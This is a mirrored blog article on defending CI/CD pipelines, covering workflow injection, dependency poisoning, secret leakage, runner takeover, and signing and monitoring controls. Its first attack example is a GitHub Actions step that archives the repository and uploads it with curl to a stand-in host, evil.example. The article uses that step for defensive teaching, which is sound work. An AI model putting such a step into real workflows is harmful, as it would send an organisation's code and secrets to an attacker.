class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-3 menu__list-item"><a class="menu__link" tabindex="0" href="/medium-blog-navigation/docs/articles/2025/2025-12-21-ai-driven-pentesting-at-home-using-hexstrike-ai-for-full-network-discovery-and-exploitatio-00a9e88b3bde"><span title="AI-Driven Pentesting at Home: Using HexStrike-AI for Full Network Discovery and Exploitation" class="linkLabel_WmDU">AI-Driven Pentesting at Home: Using HexStrike-AI for Full Network Discovery and Exploitation</span></a></li><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-3 menu__list-item"><a class="menu__link" tabindex="0" href="/medium-blog-navigation/docs/articles/2025/2025-12-22-ai-driven-web-application-pentesting-with-hexstrike-ai-67f3dae32040"><span title="AI-Driven Web Application Pentesting with HexStrike-AI" class="linkLabel_WmDU">AI-Driven Web Application Pentesting with HexStrike-AI</span></a></li><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-3 menu__list-item"><a class="menu__link" tabindex="0" href="/medium-blog-navigation/docs/articles/2025/2025-12-23-integrating-shodan-with-hexstrike-ai-using-gemini-cli-b6f9fcbe8e6e"><span title="Integrating Shodan with HexStrike-AI Using Gemini-CLI" class="linkLabel_WmDU">Integrating Shodan with HexStrike-AI Using Gemini-CLI</span></a></li><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-3 menu__list-item"><a class="menu__link" tabindex="0" href="/medium-blog-navigation/docs/articles/2025/2025-12-24-ai-driven-wireless-penetration-testing-one-promt-wifi-cracking-6477c06f6af4"><span title="AI-Driven Wireless Penetration Testing. One Promt WIFI cracking" class="linkLabel_WmDU">AI-Driven Wireless Penetration Testing. One Promt WIFI cracking</span></a></li><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-3 menu__list-item"><a class="menu__link" tabindex="0" href="/medium-blog-navigation/docs/articles/2025/2025-12-25-ai-driven-zip-password-recovery-with-hexstrike-ai-and-gemini-cli-b8fc5c475ebc"><span title="AI-Driven ZIP Password Recovery with HexStrike-AI and Gemini-CLI" class="linkLabel_WmDU">AI-Driven ZIP Password Recovery with HexStrike-AI and Gemini-CLI</span></a></li><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-3 menu__list-item"><a class="menu__link" tabindex="0" href="/medium-blog-navigation/docs/articles/2025/2025-12-25-hexstrike-ai-a-force-multiplier-for-red-teams-and-a-dangerous-shift-in-the-threat-landscap-3e1d4e86f3ae"><span title="HexStrike-AI: A Force Multiplier for Red Teams — and a Dangerous Shift in the Threat Landscape" class="linkLabel_WmDU">HexStrike-AI: A Force Multiplier for Red Teams — and a Dangerous Shift in the Threat Landscape</span></a></li><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-3 menu__list-item"><a class="menu__link" tabindex="0" href="/medium-blog-navigation/docs/articles/2025/2025-12-26-hexstrike-gemini-vs-hackerai-ops-copilot-vs-chatbot-with-tools-1d799845410b"><span title="HexStrike + Gemini vs. HackerAI: “Ops Copilot” vs. “Chatbot with Tools”" class="linkLabel_WmDU">HexStrike + Gemini vs. HackerAI: “Ops Copilot” vs. “Chatbot with Tools”</span></a></li><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-3 menu__list-item"><a class="menu__link" tabindex="0" href="/medium-blog-navigation/docs/articles/2025/2025-12-29-ai-driven-office-documents-password-recovery-with-hexstrike-ai-and-gemini-cli-3c8bb7deb82d"><span title="AI-Driven Office Documents Password Recovery with HexStrike-AI and Gemini-CLI" class="linkLabel_WmDU">AI-Driven Office Documents Password Recovery with HexStrike-AI and Gemini-CLI</span></a></li><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-3 menu__list-item"><a class="menu__link" tabindex="0" href="/medium-blog-navigation/docs/articles/2025/2025-12-29-ai-driven-pdf-password-recovery-with-hexstrike-ai-and-gemini-cli-cfa7eb0fae91"><span title="AI-Driven PDF Password Recovery with HexStrike-AI and Gemini-CLI" class="linkLabel_WmDU">AI-Driven PDF Password Recovery with HexStrike-AI and Gemini-CLI</span></a></li><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-3 menu__list-item"><a class="menu__link" tabindex="0" href="/medium-blog-navigation/docs/articles/2025/2025-12-31-hexstrike-mcp-orchestration-with-ollama-ubuntu-host-kali-vm-ssh-bridging-and-performance-f049ab140596"><span title="HexStrike MCP Orchestration with Ollama: Ubuntu Host, Kali VM, SSH Bridging, and Performance…" class="linkLabel_WmDU">HexStrike MCP Orchestration with Ollama: Ubuntu Host, Kali VM, SSH Bridging, and Performance…</span></a></li></ul></li><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-2 menu__list-item menu__list-item--collapsed"><div class="menu__list-item-collapsible"><a class="categoryLink_byQd menu__link menu__link--sublist menu__link--sublist-caret" role="button" aria-expanded="false" tabindex="0" href="/medium-blog-navigation/docs/articles/2026/2026-01-02-burp-suite-mcp-gemini-cli-c1229edfe092"><span title="2026" class="categoryLinkLabel_W154">2026</span></a></div></li><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-2 menu__list-item"><a class="menu__link" tabindex="0" href="/medium-blog-navigation/docs/articles/"><span title="Article Archive" class="linkLabel_WmDU">Article Archive</span></a></li></ul></li><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-1 menu__list-item"><div class="menu__list-item-collapsible"><a class="categoryLink_byQd menu__link menu__link--sublist menu__link--sublist-caret" role="button" aria-expanded="true" href="/medium-blog-navigation/docs/labs/"><span title="Labs" class="categoryLinkLabel_W154">Labs</span></a></div><ul class="menu__list"><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-2 menu__list-item"><a class="menu__link" tabindex="0" href="/medium-blog-navigation/docs/labs/"><span title="Labs and Deployment Guides" class="linkLabel_WmDU">Labs and Deployment Guides</span></a></li><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-2 menu__list-item menu__list-item--collapsed"><div class="menu__list-item-collapsible"><a class="categoryLink_byQd menu__link menu__link--sublist menu__link--sublist-caret" role="button" aria-expanded="false" tabindex="0" href="/medium-blog-navigation/docs/labs/llm-agent-attack-lab"><span title="AI Security" class="categoryLinkLabel_W154">AI Security</span></a></div></li><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-2 menu__list-item menu__list-item--collapsed"><div class="menu__list-item-collapsible"><a class="categoryLink_byQd menu__link menu__link--sublist menu__link--sublist-caret" role="button" aria-expanded="false" tabindex="0" href="/medium-blog-navigation/docs/labs/hackerai-metasploitable-lab"><span title="AI-Assisted Pentest" class="categoryLinkLabel_W154">AI-Assisted Pentest</span></a></div></li><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-2 menu__list-item menu__list-item--collapsed"><div class="menu__list-item-collapsible"><a class="categoryLink_byQd menu__link menu__link--sublist menu__link--sublist-caret" role="button" aria-expanded="false" tabindex="0" href="/medium-blog-navigation/docs/labs/active-directory-manual-lab"><span title="Active Directory" class="categoryLinkLabel_W154">Active Directory</span></a></div></li><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-2 menu__list-item menu__list-item--collapsed"><div class="menu__list-item-collapsible"><a class="categoryLink_byQd menu__link menu__link--sublist menu__link--sublist-caret" role="button" aria-expanded="false" tabindex="0" href="/medium-blog-navigation/docs/labs/operation-dragonrx-attack-playbook"><span title="CTI Emulation" class="categoryLinkLabel_W154">CTI Emulation</span></a></div></li><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-2 menu__list-item menu__list-item--collapsed"><div class="menu__list-item-collapsible"><a class="categoryLink_byQd menu__link menu__link--sublist menu__link--sublist-caret" role="button" aria-expanded="false" tabindex="0" href="/medium-blog-navigation/docs/labs/ai-web-cloud-pentest-lab"><span title="Cloud" class="categoryLinkLabel_W154">Cloud</span></a></div></li><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-2 menu__list-item menu__list-item--collapsed"><div class="menu__list-item-collapsible"><a class="categoryLink_byQd menu__link menu__link--sublist menu__link--sublist-caret" role="button" aria-expanded="false" tabindex="0" href="/medium-blog-navigation/docs/labs/black-box-kubernetes-pentest-playbook"><span title="Kubernetes" class="categoryLinkLabel_W154">Kubernetes</span></a></div></li><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-2 menu__list-item menu__list-item--collapsed"><div class="menu__list-item-collapsible"><a class="categoryLink_byQd menu__link menu__link--sublist menu__link--sublist-caret" role="button" aria-expanded="false" tabindex="0" href="/medium-blog-navigation/docs/labs/android-app-analysis-lab"><span title="Mobile Security" class="categoryLinkLabel_W154">Mobile Security</span></a></div></li><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-2 menu__list-item menu__list-item--collapsed"><div class="menu__list-item-collapsible"><a class="categoryLink_byQd menu__link menu__link--sublist menu__link--sublist-caret" role="button" aria-expanded="false" tabindex="0" href="/medium-blog-navigation/docs/labs/dockerized-ai-host-vulnerability-assessment"><span title="Tooling" class="categoryLinkLabel_W154">Tooling</span></a></div></li><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-2 menu__list-item menu__list-item--collapsed"><div class="menu__list-item-collapsible"><a class="categoryLink_byQd menu__link menu__link--sublist menu__link--sublist-caret" role="button" aria-expanded="false" tabindex="0" href="/medium-blog-navigation/docs/labs/vulnerable-iis-sharepoint-fluent-bit-lab"><span title="Vulnerable Infrastructure" class="categoryLinkLabel_W154">Vulnerable Infrastructure</span></a></div></li><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-2 menu__list-item menu__list-item--collapsed"><div class="menu__list-item-collapsible"><a class="categoryLink_byQd menu__link menu__link--sublist menu__link--sublist-caret" role="button" aria-expanded="false" tabindex="0" href="/medium-blog-navigation/docs/labs/safe-dvwa-ansible-lab"><span title="Vulnerable Web" class="categoryLinkLabel_W154">Vulnerable Web</span></a></div></li></ul></li></ul></nav></div></div></aside><main class="docMainContainer_TBSr"><div class="container padding-top--md padding-bottom--lg"><div class="row"><div class="col docItemCol_VOVn"><div class="docItemContainer_Djhp"><article><nav class="theme-doc-breadcrumbs breadcrumbsContainer_Z_bl" aria-label="Breadcrumbs"><ul class="breadcrumbs"><li class="breadcrumbs__item"><a aria-label="Home page" class="breadcrumbs__link" href="/medium-blog-navigation/"><svg viewBox="0 0 24 24" class="breadcrumbHomeIcon_YNFT"><path d="M10 19v-5h4v5c0 .55.45 1 1 1h3c.55 0 1-.45 1-1v-7h1.7c.46 0 .68-.57.33-.87L12.67 3.6c-.38-.34-.96-.34-1.34 0l-8.36 7.53c-.34.3-.13.87.33.87H5v7c0 .55.45 1 1 1h3c.55 0 1-.45 1-1z" fill="currentColor"></path></svg></a></li><li class="breadcrumbs__item"><a class="breadcrumbs__link" href="/medium-blog-navigation/docs/articles/"><span>Articles</span></a></li><li class="breadcrumbs__item"><span class="breadcrumbs__link">2025</span></li><li class="breadcrumbs__item breadcrumbs__item--active"><span class="breadcrumbs__link">The Invisible Pipeline: Defending CI/CD from Targeted Attacks</span></li></ul></nav><div class="tocCollapsible_ETCw theme-doc-toc-mobile tocMobile_ITEo"><button type="button" class="clean-btn tocCollapsibleButton_TO0P">On this page</button></div><div class="theme-doc-markdown markdown"><header><h1>The Invisible Pipeline: Defending CI/CD from Targeted Attacks</h1></header>
<p><img decoding="async" loading="lazy" src="https://cdn-images-1.medium.com/max/800/1*CEihhwPyac_RsY7p_uSmLA.jpeg" alt="Cover image" class="img_ev3q"></p>
<div class="theme-admonition theme-admonition-info admonition_xJq3 alert alert--info"><div class="admonitionHeading_Gvgb"><span class="admonitionIcon_Rf37"><svg viewBox="0 0 14 16"><path fill-rule="evenodd" d="M7 2.3c3.14 0 5.7 2.56 5.7 5.7s-2.56 5.7-5.7 5.7A5.71 5.71 0 0 1 1.3 8c0-3.14 2.56-5.7 5.7-5.7zM7 1C3.14 1 0 4.14 0 8s3.14 7 7 7 7-3.14 7-7-3.14-7-7-7zm1 3H6v5h2V4zm0 6H6v2h2v-2z"></path></svg></span>Article Metadata</div><div class="admonitionContent_BuS1"><ul>
<li class=""><strong>Category:</strong> CTI</li>
<li class=""><strong>Source article:</strong> <a href="https://medium.com/@1200km/the-invisible-pipeline-defending-ci-cd-from-targeted-attacks-456283ee5ed3" target="_blank" rel="noopener noreferrer" class="">https://medium.com/@1200km/the-invisible-pipeline-defending-ci-cd-from-targeted-attacks-456283ee5ed3</a></li>
<li class=""><strong>Published:</strong> 2025-10-14</li>
<li class=""><strong>Preserved media:</strong> 1 image(s), including cover images, screenshots, diagrams, and infographics where present.</li>
<li class=""><strong>Preserved technical blocks:</strong> 3 code/configuration block(s).</li>
</ul></div></div>
<h2 class="anchor anchorTargetStickyNavbar_Vzrq" id="ecosystem-fit">Ecosystem Fit<a href="#ecosystem-fit" class="hash-link" aria-label="Direct link to Ecosystem Fit" title="Direct link to Ecosystem Fit" translate="no">​</a></h2>
<p>This page mirrors the original Medium article into the 1200km.com Docusaurus ecosystem. The original article flow, images, screenshots, infographics, and technical blocks are preserved from the export.</p>
<h3 class="anchor anchorTargetStickyNavbar_Vzrq" id="how-adversaries-weaponize-build-systems--and-the-concrete-tools--controls-you-can-use-to-stop-them">How adversaries weaponize build systems — and the concrete tools &amp; controls you can use to stop them<a href="#how-adversaries-weaponize-build-systems--and-the-concrete-tools--controls-you-can-use-to-stop-them" class="hash-link" aria-label="Direct link to How adversaries weaponize build systems — and the concrete tools &amp; controls you can use to stop them" title="Direct link to How adversaries weaponize build systems — and the concrete tools &amp; controls you can use to stop them" translate="no">​</a></h3>
<p><img decoding="async" loading="lazy" src="https://cdn-images-1.medium.com/max/800/1*CEihhwPyac_RsY7p_uSmLA.jpeg" alt="Article image" class="img_ev3q"></p>
<p>CI/CD pipelines are the nervous system of modern software delivery: automated, highly privileged, and — until recently — under-monitored. That combination makes them an attractive target for attackers who want persistent, high-impact access to source code, secrets, artifact registries, and production systems. This longform guide dives deeper than the usual “secure your tokens” advice. You’ll get concrete attack patterns, realistic examples, and direct recommendations (with tool names and config snippets) you can apply today.</p>
<h2 class="anchor anchorTargetStickyNavbar_Vzrq" id="quick-roadmap">Quick roadmap<a href="#quick-roadmap" class="hash-link" aria-label="Direct link to Quick roadmap" title="Direct link to Quick roadmap" translate="no">​</a></h2>
<ul>
<li class="">
<p>Attack surface &amp; why it matters</p>
</li>
<li class="">
<p>High-risk vectors with real examples</p>
</li>
<li class="">
<p>Defensive controls — tools, configs, and sample code</p>
</li>
<li class="">
<p>Detection &amp; incident playbook outline</p>
</li>
<li class="">
<p>Practical checklist + TL;DR</p>
</li>
</ul>
<h2 class="anchor anchorTargetStickyNavbar_Vzrq" id="1-why-cicd-is-so-valuable-to-attackers">1) Why CI/CD is so valuable to attackers<a href="#1-why-cicd-is-so-valuable-to-attackers" class="hash-link" aria-label="Direct link to 1) Why CI/CD is so valuable to attackers" title="Direct link to 1) Why CI/CD is so valuable to attackers" translate="no">​</a></h2>
<ul>
<li class="">
<p><strong>High privilege</strong>: build agents often hold cloud API keys, deploy tokens, and registry creds.</p>
</li>
<li class="">
<p><strong>Trusted path to production</strong>: a compromised pipeline can sign, publish, and deploy malicious artifacts.</p>
</li>
<li class="">
<p><strong>Scale &amp; stealth</strong>: a single poisoned artifact or workflow can affect many services with one commit.</p>
</li>
</ul>
<h2 class="anchor anchorTargetStickyNavbar_Vzrq" id="2-attack-vectors--detailed-with-examples">2) Attack vectors — detailed, with examples<a href="#2-attack-vectors--detailed-with-examples" class="hash-link" aria-label="Direct link to 2) Attack vectors — detailed, with examples" title="Direct link to 2) Attack vectors — detailed, with examples" translate="no">​</a></h2>
<h3 class="anchor anchorTargetStickyNavbar_Vzrq" id="a-workflow--pipeline-injection-eg-github-actions-gitlab-ci">A. Workflow / pipeline injection (e.g., GitHub Actions, GitLab CI)<a href="#a-workflow--pipeline-injection-eg-github-actions-gitlab-ci" class="hash-link" aria-label="Direct link to A. Workflow / pipeline injection (e.g., GitHub Actions, GitLab CI)" title="Direct link to A. Workflow / pipeline injection (e.g., GitHub Actions, GitLab CI)" translate="no">​</a></h3>
<p><strong>What</strong>: An attacker submits a PR or compromises a dev account to change a workflow that runs arbitrary commands during CI.</p>
<p><strong>Example (malicious GitHub Action step)</strong>:</p>
<div class="language-text codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#393A34;--prism-background-color:#f6f8fa"><div class="codeBlockContent_QJqH"><pre tabindex="0" class="prism-code language-text codeBlock_bY9V thin-scrollbar" style="color:#393A34;background-color:#f6f8fa"><code class="codeBlockLines_e6Vv"><div class="token-line" style="color:#393A34"><span class="token plain"># .github/workflows/ci.yml</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">jobs:</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">  </span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">build:</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">    </span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">runs-on:</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain"> </span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">ubuntu-latest</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">    </span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">steps:</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">      </span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">-</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain"> </span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">uses:</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain"> </span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">actions/checkout@v4</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">      </span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">-</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain"> </span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">name:</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain"> </span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">Build</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain"> </span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">and</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain"> </span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">exfiltrate</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain"> </span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">secrets</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">        </span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">run:</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain"> </span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">|</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">          tar -czf /tmp/code.tgz .</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">          curl -X POST https://evil.example/upload -F file=@/tmp/code.tgz</span><br></div></code></pre></div></div>
<p><strong>Why it works</strong>: Many repos auto-run workflows on PRs or merges; a workflow runs with permissions of the runner and may have access to secrets.</p>
<h3 class="anchor anchorTargetStickyNavbar_Vzrq" id="b-dependencyregistry-poisoning-typosquatting-dependency-confusion">B. Dependency/registry poisoning (typosquatting, dependency confusion)<a href="#b-dependencyregistry-poisoning-typosquatting-dependency-confusion" class="hash-link" aria-label="Direct link to B. Dependency/registry poisoning (typosquatting, dependency confusion)" title="Direct link to B. Dependency/registry poisoning (typosquatting, dependency confusion)" translate="no">​</a></h3>
<p><strong>What</strong>: Publish a malicious package (PyPI, npm) with a name similar to an internal package or exploit misconfigured private/public precedence.</p>
<p><strong>Tools / Mitigations</strong>:</p>
<ul>
<li class="">
<p>Use<strong>SBOM</strong>tooling (Syft) and vulnerability scanning (Grype/Trivy).</p>
</li>
<li class="">
<p>Enforce private registry usage and prevent accidental fallback to the public registry.</p>
</li>
</ul>
<h3 class="anchor anchorTargetStickyNavbar_Vzrq" id="c-secret-leakage-hardcoded-tokens--env-vars">C. Secret leakage (hardcoded tokens / env vars)<a href="#c-secret-leakage-hardcoded-tokens--env-vars" class="hash-link" aria-label="Direct link to C. Secret leakage (hardcoded tokens / env vars)" title="Direct link to C. Secret leakage (hardcoded tokens / env vars)" translate="no">​</a></h3>
<p><strong>What</strong>: Secrets in code or cache are exfiltrated during builds.</p>
<p><strong>Detection &amp; tools</strong>:</p>
<ul>
<li class="">
<p><strong>Gitleaks</strong>,<strong>truffleHog</strong>to scan repo history and PRs.</p>
</li>
<li class="">
<p>GitHub<strong>secret scanning</strong>, GitLab secret detection, or<strong>Snyk Code</strong>.</p>
</li>
</ul>
<h3 class="anchor anchorTargetStickyNavbar_Vzrq" id="d-build-agent-takeover-docker-socket-vulnerable-base-images">D. Build agent takeover (docker socket, vulnerable base images)<a href="#d-build-agent-takeover-docker-socket-vulnerable-base-images" class="hash-link" aria-label="Direct link to D. Build agent takeover (docker socket, vulnerable base images)" title="Direct link to D. Build agent takeover (docker socket, vulnerable base images)" translate="no">​</a></h3>
<p><strong>What</strong>: Runners with Docker socket mounted or stale images allow attackers to break out, steal host credentials, or pivot.</p>
<p><strong>Examples of bad practice</strong>:</p>
<ul>
<li class="">Self-hosted runner with<code>/var/run/docker.sock</code>mounted and cached credentials in<code>/root/.aws/credentials</code>.</li>
</ul>
<p><strong>Mitigations</strong>:</p>
<ul>
<li class="">
<p>Avoid mounting host Docker socket — use<strong>Kaniko</strong>,<strong>buildah</strong>, or<strong>kaniko-in-cluster</strong>for container builds.</p>
</li>
<li class="">
<p>Use ephemeral runners (Kubernetes pods) and redeploy them cleanly per job.</p>
</li>
</ul>
<h3 class="anchor anchorTargetStickyNavbar_Vzrq" id="e-artifact-repository-compromise-nexus-artifactory-github-packages">E. Artifact repository compromise (Nexus, Artifactory, GitHub Packages)<a href="#e-artifact-repository-compromise-nexus-artifactory-github-packages" class="hash-link" aria-label="Direct link to E. Artifact repository compromise (Nexus, Artifactory, GitHub Packages)" title="Direct link to E. Artifact repository compromise (Nexus, Artifactory, GitHub Packages)" translate="no">​</a></h3>
<p><strong>What</strong>: Replace artifacts or publish tampered images with a<code>latest</code>tag that pipelines pull.</p>
<p><strong>Mitigations</strong>:</p>
<ul>
<li class="">
<p>Sign artifacts with<strong>Sigstore / Cosign</strong>and validate signatures in deploy pipelines.</p>
</li>
<li class="">
<p>Lock immutability policies on registries (immutable tags).</p>
</li>
</ul>
<h3 class="anchor anchorTargetStickyNavbar_Vzrq" id="3-defenses--concrete-tools-configs--examples">3) Defenses — concrete tools, configs &amp; examples<a href="#3-defenses--concrete-tools-configs--examples" class="hash-link" aria-label="Direct link to 3) Defenses — concrete tools, configs &amp; examples" title="Direct link to 3) Defenses — concrete tools, configs &amp; examples" translate="no">​</a></h3>
<p>Below are layered defenses mapped to common attack vectors. Use multiple at once.</p>
<h3 class="anchor anchorTargetStickyNavbar_Vzrq" id="identity--credentials-short-lived-auditable-tokens">Identity &amp; credentials: short-lived, auditable tokens<a href="#identity--credentials-short-lived-auditable-tokens" class="hash-link" aria-label="Direct link to Identity &amp; credentials: short-lived, auditable tokens" title="Direct link to Identity &amp; credentials: short-lived, auditable tokens" translate="no">​</a></h3>
<ul>
<li class="">
<p><strong>Use OIDC / short-lived credentials</strong>: GitHub Actions, GitLab CI and Azure Pipelines support OIDC tokens to request cloud STS credentials (no long-lived secrets).
<strong>GitHub Actions → AWS STS example (workflow snippet)</strong>:</p>
</li>
<li class="">
<p><code>permissions: id-token: write contents: read jobs: deploy: runs-on: ubuntu-latest steps: - name: Configure AWS credentials uses: aws-actions/configure-aws-credentials@v2 with: role-to-assume: arn:aws:iam::123456789012:role/GitHubActionsRole aws-region: us-east-1</code></p>
</li>
<li class="">
<p><strong>HashiCorp Vault</strong>with dynamic secrets: issue DB and cloud creds on demand; rotate automatically.</p>
</li>
</ul>
<h3 class="anchor anchorTargetStickyNavbar_Vzrq" id="secrets-management">Secrets management<a href="#secrets-management" class="hash-link" aria-label="Direct link to Secrets management" title="Direct link to Secrets management" translate="no">​</a></h3>
<ul>
<li class="">
<p>Centralize secrets:<strong>Vault</strong>,<strong>AWS Secrets Manager</strong>,<strong>Azure Key Vault</strong>, or<strong>GCP Secret Manager</strong>.</p>
</li>
<li class="">
<p>Inject secrets at runtime via vault agents or environment-providers (not via plain env vars checked into code).</p>
</li>
</ul>
<h3 class="anchor anchorTargetStickyNavbar_Vzrq" id="supply-chain-integrity">Supply-chain integrity<a href="#supply-chain-integrity" class="hash-link" aria-label="Direct link to Supply-chain integrity" title="Direct link to Supply-chain integrity" translate="no">​</a></h3>
<ul>
<li class="">
<p><strong>Sigstore / Cosign + Rekor</strong>: sign container images and verify signatures during deployment.</p>
</li>
<li class="">
<p>Generate<strong>SBOMs</strong>with<strong>Syft</strong>and scan with<strong>Grype</strong>/<strong>Trivy</strong>during CI.</p>
</li>
<li class="">
<p>Example: Sign image after build:</p>
</li>
<li class="">
<p><code>cosign sign --key cosign.key ghcr.io/org/myimage:sha256-... # Verify during deployment: cosign verify --key cosign.pub ghcr.io/org/myimage:sha256-...</code></p>
</li>
</ul>
<h3 class="anchor anchorTargetStickyNavbar_Vzrq" id="pipeline-hardening--policy">Pipeline hardening &amp; policy<a href="#pipeline-hardening--policy" class="hash-link" aria-label="Direct link to Pipeline hardening &amp; policy" title="Direct link to Pipeline hardening &amp; policy" translate="no">​</a></h3>
<ul>
<li class="">
<p>Treat pipeline definitions as code: require<strong>PR review</strong>and branch protection on<code>.github/workflows/*</code>.</p>
</li>
<li class="">
<p>Use<strong>policy-as-code</strong>:</p>
</li>
<li class="">
<p><strong>Open Policy Agent (OPA)/Gatekeeper</strong>for Kubernetes admission controls.</p>
</li>
<li class="">
<p><strong>Conftest</strong>,<strong>Terraform Sentinel</strong>, or<strong>OPA</strong>checks integrated in CI to block dangerous pipeline changes.</p>
</li>
<li class="">
<p>Enforce least privilege for runner tokens and repository permissions.</p>
</li>
</ul>
<h3 class="anchor anchorTargetStickyNavbar_Vzrq" id="static--dynamic-analysis-tooling">Static &amp; dynamic analysis (tooling)<a href="#static--dynamic-analysis-tooling" class="hash-link" aria-label="Direct link to Static &amp; dynamic analysis (tooling)" title="Direct link to Static &amp; dynamic analysis (tooling)" translate="no">​</a></h3>
<ul>
<li class="">
<p><strong>SAST / Secret Scanning</strong>: GitHub Advanced Security,<strong>Gitleaks</strong>,<strong>TruffleHog</strong>,<strong>Snyk</strong>,<strong>Checkmarx</strong>.</p>
</li>
<li class="">
<p><strong>Container/Image scanning</strong>:<strong>Trivy</strong>,<strong>Clair</strong>,<strong>Anchore</strong>,<strong>Aqua</strong>.</p>
</li>
<li class="">
<p><strong>IaC scanning</strong>:<strong>Checkov</strong>,<strong>tfsec</strong>,<strong>terrascan</strong>.</p>
</li>
</ul>
<h3 class="anchor anchorTargetStickyNavbar_Vzrq" id="protect-runners--build-hosts">Protect runners / build hosts<a href="#protect-runners--build-hosts" class="hash-link" aria-label="Direct link to Protect runners / build hosts" title="Direct link to Protect runners / build hosts" translate="no">​</a></h3>
<ul>
<li class="">
<p>Use<strong>ephemeral runners</strong>: GitHub Actions self-hosted runners on Kubernetes using<strong>act-runner-controller</strong>or GitLab Kubernetes runners.</p>
</li>
<li class="">
<p>Restrict network egress for runners (deny-list external destinations) — allow only necessary registries and artifact stores.</p>
</li>
<li class="">
<p>Run runners in<strong>isolated namespaces</strong>, no access to production secrets.</p>
</li>
</ul>
<h3 class="anchor anchorTargetStickyNavbar_Vzrq" id="logging-detection--runtime-controls">Logging, detection &amp; runtime controls<a href="#logging-detection--runtime-controls" class="hash-link" aria-label="Direct link to Logging, detection &amp; runtime controls" title="Direct link to Logging, detection &amp; runtime controls" translate="no">​</a></h3>
<ul>
<li class="">
<p>Ship CI logs to central observability:<strong>XPLG /ELK / Splunk</strong>. Correlate with identity logs.</p>
</li>
<li class="">
<p>Use<strong>Falco</strong>to detect suspicious container activity on runner hosts (sudden outbound to unusual domains, process injection).</p>
</li>
<li class="">
<p>Add<strong>audit logging</strong>for artifact registries and cloud API calls.</p>
</li>
</ul>
<h3 class="anchor anchorTargetStickyNavbar_Vzrq" id="4-example-defenses-in-a-flow--an-end-to-end-sequence">4) Example defenses in a flow — an end-to-end sequence<a href="#4-example-defenses-in-a-flow--an-end-to-end-sequence" class="hash-link" aria-label="Direct link to 4) Example defenses in a flow — an end-to-end sequence" title="Direct link to 4) Example defenses in a flow — an end-to-end sequence" translate="no">​</a></h3>
<ul>
<li class="">
<p>Developer opens PR to change code or workflow.</p>
</li>
<li class="">
<p><strong>Checks</strong>: PR trigger runs<strong>gitleaks</strong>,<strong>Conftest</strong>policy checks on workflow files.</p>
</li>
<li class="">
<p>If workflow files changed, require manual approval from infra/security team (branch protection).</p>
</li>
</ul>
<ol start="2">
<li class="">Build runs on ephemeral Kubernetes runner.</li>
</ol>
<ul>
<li class="">
<p>Runner fetches dynamic credentials via<strong>OIDC → AWS STS</strong>(no stored secrets).</p>
</li>
<li class="">
<p>Container built using<strong>Kaniko</strong>, produces an SBOM (Syft) and scanned with<strong>Trivy</strong>.</p>
</li>
<li class="">
<p>Image signed via<strong>Cosign</strong>and published to registry with immutability.</p>
</li>
</ul>
<ol start="3">
<li class="">Deployment pipeline verifies Cosign signature and SBOM.</li>
</ol>
<ul>
<li class="">Any mismatch or vulnerability above threshold blocks deploy.</li>
</ul>
<ol start="4">
<li class="">Monitoring: Falco + ELK alert on unusual outbound traffic or attempts to call<code>cosign verify</code>failures.</li>
</ol>
